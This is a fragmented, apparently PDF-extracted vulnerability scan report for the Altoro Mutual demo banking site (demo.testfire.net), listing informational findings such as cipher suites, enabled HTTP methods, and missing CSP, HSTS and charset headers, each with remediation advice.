Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA
Remediation:
No remediation is necessary.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117:8080/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Remediation:
No remediation is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:8443/bank/
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net:8443/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: https
ip_address: 65.61.137.117
port_number: 8443
ssl_enabled: true
transport_protocol: tcp
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:80/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117:8443/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET https://65.61.137.117:8443/index.jsp?content=inside_contact.htm HTTP/1.1
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://65.61.137.117:8443/ HTTP/1.1
Remediation:
Example of response header use:
Strict-Transport-Security: max-age=31536000
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://demo.testfire.net:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:443/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170"
height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing a strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing a strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://demo.testfire.net:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
Remediation:
Example of response header use:
Strict-Transport-Security: max-age=31536000
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117:8080/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:8080/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117:8443/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117:8443/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.
Evidence:
URL: https://demo.testfire.net/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://demo.testfire.net/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
339 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 65.61.137.117
os_name: embedded
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
http://www.openssl.org/docs/apps/ciphers.html
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA256
Remediation:
No remediation is necessary.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Evidence:
Verified: true
Today: 2019-08-05 21:59:44 -0500
Start date: 2018-12-21 02:38:15 UTC
End date: 2019-12-21 03:08:14 UTC
Expired: false
Fingerprint: B0:46:07:6F:F1:C9:1D:08:80:C8:64:5F:53:D8:C9:BE
Subject: /C=CA/ST=Ontario/L=Ottawa/O=IBM/CN=altoromutual.com
Common name: altoromutual.com
Issuer: /C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-
terms/OU=(c) 2012 Entrust, Inc. - for authorized use only/CN=Entrust
Certification Authority - L1K
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: https
ip_address: 65.61.137.117
port_number: 443
ssl_enabled: true
transport_protocol: tcp
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net:8080/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />
<b><a href="index.jsp?content=business_retirement.htm"
>Retirement Solutions</a></b><br />
